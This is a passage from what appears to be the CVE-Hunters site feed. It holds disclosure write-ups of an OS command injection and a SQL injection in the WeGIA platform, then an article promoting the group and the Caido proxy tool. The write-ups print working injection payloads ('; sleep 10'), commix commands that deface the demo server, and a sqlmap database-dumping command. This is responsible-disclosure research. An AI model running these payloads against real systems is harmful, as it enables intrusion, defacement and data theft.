target="_blank" rel="noopener" >https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-6477.md</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/raul50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/" target="_blank" rel="noopener" >Raul Pazemécxas</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Sun, 22 Jun 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-50201/ https://www.cvehunters.com/p/cve-2025-50201/ <h2 id="cve-2025-50201-os-command-injection-blind-time-based-in-debug_infophp-parameter-branch">CVE-2025-50201: OS Command Injection (Blind Time-Based) in <code>debug_info.php</code> parameter <code>branch</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-50201" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-50201</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">An OS Command Injection vulnerability was identified in the <code>/html/configuracao/debug_info.php</code> endpoint. The <code>branch</code> parameter is not properly sanitized before being concatenated and executed in a shell command on the server's operating system.</p> <p style="text-align: justify;">This flaw allows an unauthenticated attacker to execute arbitrary commands on the server with the privileges of the web server user <code>(www-data)</code>. This completely compromises the Confidentiality, Integrity, and Availability of the application and the underlying server.</p><h2 id="cve-2025-50201-os-command-injection-blind-time-based-in-debug_infophp-parameter-branch">CVE-2025-50201: OS Command Injection (Blind Time-Based) in <code>debug_info.php</code> parameter <code>branch</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-50201" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-50201</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">An OS Command Injection vulnerability was identified in the <code>/html/configuracao/debug_info.php</code> endpoint. The <code>branch</code> parameter is not properly sanitized before being concatenated and executed in a shell command on the server's operating system.</p> <p style="text-align: justify;">This flaw allows an unauthenticated attacker to execute arbitrary commands on the server with the privileges of the web server user <code>(www-data)</code>. This completely compromises the Confidentiality, Integrity, and Availability of the application and the underlying server.</p> <h2 id="details">Details </h2><p style="text-align: justify;">The vulnerability can be triggered by sending a POST request to the vulnerable endpoint and injecting shell metacharacters (such as ;) into the branch parameter. The server executes the supplied input without validation. The vulnerability was confirmed to be "Blind," as the command's output is not directly reflected in the HTTP response, thus requiring time-based exploitation techniques.</p> <p>Initial Vulnerable Request:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">POST /html/configuracao/debug_info.php HTTP/1.1 </span></span><span class="line"><span class="cl">Host: demo.wegia.org </span></span><span class="line"><span class="cl">Content-Type: application/x-www-form-urlencoded </span></span><span class="line"><span class="cl">Content-Length: 39 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">branch=master; sleep 10&action=switch </span></span></code></pre></td></tr></table> </div> </div><p style="text-align: justify;">The server's delayed response confirmed the vulnerability.</p> <h2 id="poc">PoC </h2><p style="text-align: justify;">To demonstrate a tangible impact on system integrity, the commix tool was used to inject an echo command that creates a new HTML file in a web-accessible directory on the server.</p> <h3 id="1-attack-command">1. Attack Command: </h3><p style="text-align: justify;">The following command was executed to create the prova_tcc.html file on the server with custom content:</p> <pre><code>python3 commix.py -u "https://demo.wegia.org/html/configuracao/debug_info.php" \--data="branch=master&action=switch" -p "branch" -technique="time" \--os-cmd='echo "<h1>Server Hacked - Server Access Confirmed</h1>" > prova_tcc.html'</code></pre> <p><img src="/p/cve-2025-50201/image.png" width="1919" height="718" srcset="/p/cve-2025-50201/image_hu_3421cbc964fa3b64.png 480w, /p/cve-2025-50201/image_hu_3510a028ee9d8955.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="267" data-flex-basis="641px" /></p> <pre><code>python3 commix.py -u "https://demo.wegia.org/html/configuracao/debug_info.php" --data="branch=master&action=switch" -p "branch" --technique="time" --time-sec=2 --os-cmd='echo "teste" >> ../../index.php'</code></pre> <p><img src="/p/cve-2025-50201/image-1.png" width="1919" height="701" srcset="/p/cve-2025-50201/image-1_hu_ea0b5b7bb573c69a.png 480w, /p/cve-2025-50201/image-1_hu_9c883581664d6ba6.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="273" data-flex-basis="657px" /></p> <h3 id="2-verification">2. Verification: </h3><p style="text-align: justify;">After the command execution, the created file became publicly accessible via the browser at the following URL: <code>https://demo.wegia.org/html/configuracao/prova_tcc.html</code></p> <p><img src="/p/cve-2025-50201/image-2.png" width="1909" height="1079" srcset="/p/cve-2025-50201/image-2_hu_5fab827df7411270.png 480w, /p/cve-2025-50201/image-2_hu_3bc2d6e16b2b3902.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="176" data-flex-basis="424px" /></p> <p style="text-align: justify;">After the command execution, the page <code>https://demo.wegia.org/</code> has been modified like the imagem bellow:</p> <p><img src="/p/cve-2025-50201/image-3.png" width="1906" height="1005" srcset="/p/cve-2025-50201/image-3_hu_a90f67d31bb417bd.png 480w, /p/cve-2025-50201/image-3_hu_89baf0ab6503b852.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="189" data-flex-basis="455px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;">Successful exploitation of this vulnerability allows an unauthenticated attacker to: <ul> <li>Compromise Confidentiality: Read sensitive files from the server, including the application's source code, API keys, and configuration files.</li> <li>Compromise Integrity: Modify or delete any file to which the www-data user has write permissions, allowing for website defacement, malware injection, or application destruction.</li> <li>Compromise Availability: Execute commands that consume system resources (CPU, Memory), leading to a Denial of Service (DoS).</li> <li>Act as a Pivot: Use the compromised server as a base to attack other systems on the internal network.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-52p5-5fmw-9hrf" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-52p5-5fmw-9hrf</a></p> <h2 id="reporter">Reporter </h2><p><a class="link" href="https://www.linkedin.com/in/pedro-henrique-da-costa-lyrio-020a401a3?utm_source=share&utm_campaign=share_via&utm_content=profile&utm_medium=android_app" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/pedro50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/pedro-henrique-da-costa-lyrio-020a401a3?utm_source=share&utm_campaign=share_via&utm_content=profile&utm_medium=android_app" target="_blank" rel="noopener" >Pedro Lyrio</a></p> <h2 id="contributor">Contributor </h2><p><a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/diego50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" >Diego Castro</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Thu, 19 Jun 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-52474/ https://www.cvehunters.com/p/cve-2025-52474/ <h2 id="cve-2025-52474-sql-injection-vulnerability-in-id-parameter-on-controlphp-endpoint">CVE-2025-52474: SQL Injection Vulnerability in <code>id</code> Parameter on <code>control.php</code> Endpoint </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-52474" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-52474</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A SQL Injection vulnerability was identified in the <code>id</code> parameter of the <code>/WeGIA/controle/control.php</code> endpoint. This vulnerability allows attacker to manipulate SQL queries and access sensitive database information, such as table names and sensitive data.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>GET /controle/control.php?nomeClasse=MedicamentoControle&metodo=adicionarMedicamento&modulo=pet&nomeMedicamento=DApvMr&id=<PAYLOAD>&aplicacaoMedicamento=YqchRf&descricaoMedicamento=Mrnfdh HTTP/1.1</code></p> <p>Parameter: <code>id</code></p> <h2 id="poc">PoC </h2><p>Save the request in req.txt file:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">GET /controle/control.php?nomeClasse=MedicamentoControle&metodo=adicionarMedicamento&modulo=pet&nomeMedicamento=DApvMr&id=1&aplicacaoMedicamento=YqchRf&descricaoMedicamento=Mrnfdh HTTP/1.1 </span></span><span class="line"><span class="cl">Host: demo.wegia.org </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl">sec-ch-ua-platform: "Windows" </span></span><span class="line"><span class="cl">X-Requested-With: XMLHttpRequest </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36 </span></span><span class="line"><span class="cl">Accept: text/html, */*; q=0.01 </span></span><span class="line"><span class="cl">sec-ch-ua: "Chromium";v="136", "Google Chrome";v="136", "Not.A/Brand";v="99" </span></span><span class="line"><span class="cl">sec-ch-ua-mobile: ?0 </span></span><span class="line"><span class="cl">Sec-Fetch-Site: same-origin </span></span><span class="line"><span class="cl">Sec-Fetch-Mode: cors </span></span><span class="line"><span class="cl">Sec-Fetch-Dest: empty </span></span><span class="line"><span class="cl">Referer: https://demo.wegia.org/html/home.php </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br, zstd </span></span><span class="line"><span class="cl">Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7 </span></span><span class="line"><span class="cl">Cookie: _ga=GA1.1.2068698375.1747601288; _ga_F8DXBXLV8J=GS2.1.s1747660538$o4$g0$t1747660538$j60$l0$h0$dyaL3bJ27Uic34e3jqHnkw5lGenE0npxF8g; PHPSESSID=o79b1cq9suo2gksfpnvr4cus4o </span></span></code></pre></td></tr></table> </div> </div><p>Then use sqlmap:</p><h2 id="cve-2025-52474-sql-injection-vulnerability-in-id-parameter-on-controlphp-endpoint">CVE-2025-52474: SQL Injection Vulnerability in <code>id</code> Parameter on <code>control.php</code> Endpoint </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-52474" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-52474</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A SQL Injection vulnerability was identified in the <code>id</code> parameter of the <code>/WeGIA/controle/control.php</code> endpoint. This vulnerability allows attacker to manipulate SQL queries and access sensitive database information, such as table names and sensitive data.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>GET /controle/control.php?nomeClasse=MedicamentoControle&metodo=adicionarMedicamento&modulo=pet&nomeMedicamento=DApvMr&id=<PAYLOAD>&aplicacaoMedicamento=YqchRf&descricaoMedicamento=Mrnfdh HTTP/1.1</code></p> <p>Parameter: <code>id</code></p> <h2 id="poc">PoC </h2><p>Save the request in req.txt file:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">GET /controle/control.php?nomeClasse=MedicamentoControle&metodo=adicionarMedicamento&modulo=pet&nomeMedicamento=DApvMr&id=1&aplicacaoMedicamento=YqchRf&descricaoMedicamento=Mrnfdh HTTP/1.1 </span></span><span class="line"><span class="cl">Host: demo.wegia.org </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl">sec-ch-ua-platform: "Windows" </span></span><span class="line"><span class="cl">X-Requested-With: XMLHttpRequest </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36 </span></span><span class="line"><span class="cl">Accept: text/html, */*; q=0.01 </span></span><span class="line"><span class="cl">sec-ch-ua: "Chromium";v="136", "Google Chrome";v="136", "Not.A/Brand";v="99" </span></span><span class="line"><span class="cl">sec-ch-ua-mobile: ?0 </span></span><span class="line"><span class="cl">Sec-Fetch-Site: same-origin </span></span><span class="line"><span class="cl">Sec-Fetch-Mode: cors </span></span><span class="line"><span class="cl">Sec-Fetch-Dest: empty </span></span><span class="line"><span class="cl">Referer: https://demo.wegia.org/html/home.php </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br, zstd </span></span><span class="line"><span class="cl">Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7 </span></span><span class="line"><span class="cl">Cookie: _ga=GA1.1.2068698375.1747601288; _ga_F8DXBXLV8J=GS2.1.s1747660538$o4$g0$t1747660538$j60$l0$h0$dyaL3bJ27Uic34e3jqHnkw5lGenE0npxF8g; PHPSESSID=o79b1cq9suo2gksfpnvr4cus4o </span></span></code></pre></td></tr></table> </div> </div><p>Then use sqlmap:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">sqlmap -r req -p id --risk=3 --level=5 --dbs --batch --dbms=mysql --batch </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-52474/image.png" width="1263" height="568" srcset="/p/cve-2025-52474/image_hu_41d3edbfdda17cfa.png 480w, /p/cve-2025-52474/image_hu_6c25fed07133c2cd.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="222" data-flex-basis="533px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Unauthorized access to sensitive data: An attacker can access confidential information such as credentials, personal or financial data.</li> <li>Compromise of user accounts: Using stolen credentials, attackers can gain full access to the application and perform actions on behalf of legitimate users.</li> <li>Data exfiltration: Possibility of stealing large volumes of information by dumping entire database tables.</li> <li>Reputational damage: Exposing customer data or business information can significantly harm the organization's image.</li> <li>Execution of chain attacks: Obtained information can be used to carry out new attacks, such as targeted phishing or attacks on interconnected systems.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-rwvh-2gfh-wmcm" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-rwvh-2gfh-wmcm</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Thu, 19 Jun 2025 00:00:00 +0000 https://www.cvehunters.com/articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/ https://www.cvehunters.com/articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/ <h2 id="contributions-from-the-cve-hunters-group-using-caido">Contributions from the CVE-Hunters Group using Caido </h2><p style="text-align: justify;">Information security is a precious assistance to the design, installation, and ongoing updating of computer systems, especially for public, non-profit, or educational use. With cyber attacks and data breaches on the rise, never has it been more critical to improve the open-source project security.</p> <p style="text-align: justify;">Our group, CVE-Hunters, strives to find, research, and responsibly disclose vulnerabilities (CVEs) in widely used open-source software. We contribute to the global cybersecurity community by reporting CVEs, improving code security, and helping maintainers patch actual world security vulnerabilities before they become available for attack.</p><h2 id="contributions-from-the-cve-hunters-group-using-caido">Contributions from the CVE-Hunters Group using Caido </h2><p style="text-align: justify;">Information security is a precious assistance to the design, installation, and ongoing updating of computer systems, especially for public, non-profit, or educational use. With cyber attacks and data breaches on the rise, never has it been more critical to improve the open-source project security.</p> <p style="text-align: justify;">Our group, CVE-Hunters, strives to find, research, and responsibly disclose vulnerabilities (CVEs) in widely used open-source software. We contribute to the global cybersecurity community by reporting CVEs, improving code security, and helping maintainers patch actual world security vulnerabilities before they become available for attack.</p> <p style="text-align: justify;">By on-job vulnerability research and live penetration testing, our program not only protects critical web applications but also provides hands-on training for the future generation of ethical hackers and cybersecurity experts. We try to foster a culture of active, open, and inclusive cybersecurity—allowing students and researchers to utilize state-of-the-art tools like Caido to perform simulated attacks, automate security testing, and facilitate secure development practices.</p> <h2 id="project-objectives">Project Objectives </h2><p style="text-align: justify;">Our cybersecurity research is bounded by three core pillars underpinning technical excellence and societal responsibility:</p> <p style="text-align: justify;"> <ul> <li>Bolstering the security of commonly used open-source software with the discovery, verification, and support for remediation of real-world vulnerabilities. These core bugs—be they Cross-Site Scripting (XSS), Insecure Direct Object References (IDOR), or faulty authentication—may be exploited in production, exposing sensitive information.</li> <li>Offering experiential cybersecurity training to future professionals through real-world vulnerability assessment projects. Students gain hands-on experience in bug discovery, secure code analysis, and ethical vulnerability disclosure using modern security testing tools like Caido, Burp Suite, and custom automation scripts.</li> <li>Encouraging collaborative research and responsible CVE publication of Common Vulnerabilities and Exposures to facilitate awareness of developing threats, improve transparency, and assist with the continuous hardening of critical systems.</li> </ul> </p> <h2 id="case-1-wegia-platform">Case 1: WeGIA Platform </h2><p><img src="/articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/wegia.png" width="1914" height="959" srcset="/articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/wegia_hu_2524eec9eeae804c.png 480w, /articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/wegia_hu_91fc3ba8afe4f7ad.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="199" data-flex-basis="478px" /></p> <p style="text-align: justify;">One of the main targets of our security research was the WeGIA (Web Manager for Assistance Institutions) web application — an open-source web application to manage third-sector institutions in Brazil, including NGOs, social shelters, and nonprofit institutions. Such organizations are highly reliant on donations, volunteer support, and secure processing of data to function effectively.</p> <p style="text-align: justify;">The security weaknesses that were discovered were among them critical ones such as unauthorized access, inadequate authentication processes, and data exposure vulnerabilities with considerable impact on confidentiality, integrity, and availability of sensitive information. In a fascinating collaborative pen testing challenge, CVE-Hunters community discovered, responsibly disclosed, and retried 48 security vulnerabilities (CVEs) in the WeGIA system. </p> <p style="text-align: justify;">Effective remediation and discovery of the security weaknesses made up the overall security status of the platform and facilitated long-term sustainability and trustiness of the software. This instance supports the necessity for constant vulnerability scanning and ethical hacking presence within the defense of open-source tools utilized in socially critical environments.</p> <h2 id="case-2-i-educar-platform">Case 2: i-Educar Platform </h2><p><img src="/articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/i-educar.png" width="1914" height="962" srcset="/articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/i-educar_hu_4322185b1b88d839.png 480w, /articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/i-educar_hu_1cac18ecedf8c1b3.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="198" data-flex-basis="477px" /></p> <p style="text-align: justify;">Continuing our endeavor to promote the cybersecurity of critical digital infrastructure, our research team directed its focus on the i-Educar platform, a widely used open-source school management platform adopted by numerous public schools and institutions of learning in Brazil.</p> <p style="text-align: justify;">i-Educar is designed to handle sensitive student data, including students' personal information, teachers' personal information, and learning histories. Thus, the platform becomes a premium target for any potential attackers and thus emphasizes the importance of securing it against future threats.</p> <p style="text-align: justify;">During a professional application security audit, our team of researchers found other vulnerabilities in the i-Educar system. These included some authentication bypass, insecure exposure of data, and access controls that were improper in nature—both of which can potentially compromise educational information's confidentiality, integrity, and availability.</p> <p style="text-align: justify;">To date, 3 of the vulnerabilities have been officially assigned CVE IDs and responsibly disclosed to the project maintainers following best practices for coordinated disclosure. The remaining findings are awaiting technical validation and documentation and will be submitted for CVE publication in the coming weeks.</p> <p style="text-align: justify;">This case study illustrates the importance of vulnerability research to the education community, especially when dealing with open-source platforms which have been storing personally identifiable information (PII). Securing i-Educar, we are committed to making it easier for a secure online community for schools and students.</p> <h2 id="support-tool-caido">Support Tool: Caido </h2><p><img src="/articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/caido.webp" width="2600" height="1417" srcset="/articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/caido_hu_9c404777f95c89b8.webp 480w, /articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/caido_hu_352aa15174226705.webp 1024w" loading="lazy" class="gallery-image" data-flex-grow="183" data-flex-basis="440px" /></p> <p style="text-align: justify;">In our thorough web app security testing, Caido has been one of our go-to tools to discover, exploit, and document vulnerabilities. Created for pen testers, security researchers, and bug bounty hunters in mind, Caido is a contemporary and lightweight alternative to Burp Suite that provides a user-friendly interface without any loss of features.</p> <p style="text-align: justify;">With functionalities tailored to ethical hacking and web application penetration testing, Caido enables efficient workflows in both manual and semi-automated testing environments. Caido's ability to intercept traffic, map the structure of sites, and manage enormous volumes of HTTP requests qualifies it to identify issues like XSS, CSRF, IDOR, authentication flaws, and insecure session ID management.</p> <p style="text-align: justify;">Apart from its clean UI and smoothness, Caido's design is scalable—making it part of the best tools for security practitioners to look for an enterprise-level web vulnerability scanner and exploit tool in real-world engagements. Be it doing OWASP Top 10 testing or technical deep auditing, Caido is an integral component of an offensive security toolkit in the modern world.</p> <h3 id="simple-and-functional-interface"><em>Simple and functional interface</em> </h3><p><img src="/articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/interface.png" width="974" height="738" srcset="/articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/interface_hu_946c678debb29535.png 480w, /articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/interface_hu_5a3572f402be32ad.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="131" data-flex-basis="316px" /></p> <p style="text-align: justify;">Caido has a minimal, modern, and user-friendly interface designed to ease the web application penetration testing process. Useful features such as a dynamic site map, full browsing history, and real-time interception of HTTP traffic allow security researchers to gain extensive visibility into the structure and operation of the targeted application.</p> <p style="text-align: justify;">These allow for faster and more precise identification of potential attack vectors, making Caido the solution of choice among professionals looking for an easy-to-use yet powerful platform for real-time request exploration, parameter inspection, and vulnerability detection. From endpoint mapping complex endpoints to analyzing live sessions, Caido optimizes the process without compromising depth or precision.</p> <h3 id="automation-with"><em>Automation with “Automate”</em> </h3><p><img src="/articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/automate.png" width="1424" height="627" srcset="/articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/automate_hu_b71d2686d66b9f75.png 480w, /articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/automate_hu_1ff1724a47fc979e.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="227" data-flex-basis="545px" /></p> <p style="text-align: justify;">The "Automate" feature of Caido allows security professionals to configure and execute customized vulnerability scans with precision and velocity. It is specifically helpful in automating the detection of common web application vulnerabilities such as Cross-Site Scripting (XSS), Cross-Site Request Forgery (CSRF), Insecure Direct Object References (IDOR), and authentication or session management issues.</p> <p style="text-align: justify;">In supporting scripted test automation and payload injection for tailor-made payloads, Caido's Automate functionality slashes manual labor significantly but boosts precision in identifying security issues in complex web environments. It is an ideal addition for penetration testers and bug bounty hunters alike to enhance their web application security testing using automated, efficient scans tailored to their specific testing scope.</p> <h3 id="project-management"><em>Project management</em> </h3><p><img src="/articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/scopes.png" width="882" height="451" srcset="/articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/scopes_hu_3ab3440b6ccc98cc.png 480w, /articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/scopes_hu_827f3f99ffd7ccda.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="195" data-flex-basis="469px" /></p> <p style="text-align: justify;">Caido supports efficient penetration testing procedures through the capability to work on several projects simultaneously without having to restart the application. This kind of functionality is necessary for specialists with several web security tests to execute simultaneously, supporting easy switching between targets without jeopardizing information integrity.</p> <p style="text-align: justify;">To make pentest campaign management even simpler, Caido has a full-featured Scopes feature. With it, users can effectively define, segment, and manage multiple testing scopes within one project. This proves useful to segment tests in terms of different domains, apps, or environments — improving organization, reducing noise, and supporting targeted vulnerability analysis. </p> <p style="text-align: justify;">By combining multi-project capability with scope-limited testing via environments, Caido keeps penetration testers, bug bounty hunters, and security researchers productive, effective, and concentrated on the most important bugs.</p> <h3 id="filters-with-httpql"><em>Filters with HTTPQL</em> </h3><p><img src="/articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/filters.png" width="1324" height="422" srcset="/articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/filters_hu_c24f37b46942eccd.png 480w, /articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/filters_hu_b74b8191f7d2bf3.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="313" data-flex-basis="752px" /></p> <p style="text-align: justify;">The Caido HTTPQL search engine provides for precise filtering and thorough examination of HTTP requests, even for heavy web traffic. As a security researcher and penetration tester, this concise and straightforward query language assists you in quickly navigating colossal sets of data without being an expert programmer.</p> <p style="text-align: justify;">With HTTPQL, advanced request filtering is made simpler to implement, and this accelerates the identification of security flaws such as injection points, authentication errors, and session irregularities, which makes it an essential utility for automated web traffic auditing and mass-scale vulnerability testing.</p> <p style="text-align: justify;">Caido also takes the lead in delivering cutting-edge features that make it stronger in real-world penetration testing and security auditing scenarios:</p> <p style="text-align: justify;"> <ul> <li><b>Invisible proxy:</b> Conveniently captures and saves client and device network traffic that isn't supported by manual proxy configuration. This is especially helpful when testing embedded software, IoT devices, mobile apps, and blocked browsers for deep security analysis in otherwise hard-to-test cases.</li> <li><b>DNS override:</b> Provides fine-grained control of domain name resolution during security testing to enable pentesters to spoof DNS, redirect traffic, and create realistic test cases. It is necessary to verify DNS-related vulnerabilities, perform phishing attacks, and analyze complex network attack vectors.</li> <li><b>Browser integration:</b> Facilitates instantaneous inspection and dynamic inspection of HTTP/HTTPS traffic from modern web browsers, including those with strong reliance on JavaScript and dynamic content loading. The integration improves the efficiency of testing highly interactive web applications, single-page applications (SPA), and rich-client environments, which permit cross-site scripting (XSS), authentication problems, and other client-side attack detection.</li> </ul> </p> <h2 id="about-the-cve-hunters-group-formation-evolution-and-mission">About the CVE-Hunters Group: Formation, Evolution and Mission </h2><p><img src="/articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/repo.png" width="674" height="848" srcset="/articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/repo_hu_1766647e601cd925.png 480w, /articles/discovery-of-51-cves---how-caido-helped-our-open-source-security-research/repo_hu_70e520e1660c3d3e.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="79" data-flex-basis="190px" /></p> <p style="text-align: justify;">CVE-Hunters is a dedicated information security research group specializing in the discovery, analysis, and responsible disclosure of vulnerabilities in critical software applications. Founded in December 2024 by cybersecurity expert Professor <a href="https://www.linkedin.com/in/nmmorette" >Natan Morette</a>, the group started with just four passionate students eager to deepen their knowledge in offensive security and ethical hacking.</p> <p style="text-align: justify;">Under the expert technical and ethical mentorship of Professor <a href="https://www.linkedin.com/in/nmmorette">Natan</a>, CVE-Hunters has steadily grown and matured. Today, we proudly count 10 active cybersecurity researchers who apply practical skills learned in both academic settings and hands-on lab environments. Our core focus areas include penetration testing, vulnerability assessment, CVE publication, and contributing to the security hardening of impactful open-source projects with significant social relevance.</p> <p style="text-align: justify;">Our research and development work is continuously evolving. We are actively analyzing new security flaws, documenting technical details, and preparing additional responsible vulnerability disclosures to the community.</p> <p style="text-align: justify;">To learn more about our team members, explore our ongoing projects, and follow the latest CVE publications, visit our official GitHub repository at: <a href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters">https://github.com/Sec-Dojo-Cyber-House/cve-hunters</a>.</p> <p style="text-align: justify;">All identified vulnerabilities and officially published CVEs by CVE-Hunters are transparently catalogued and accessible on our official website: <a href="https://sec-dojo-cyber-house.github.io/">https://sec-dojo-cyber-house.github.io/</a>.</p> <p style="text-align: center;">“Security is a journey, not a destination.” <br /> <a 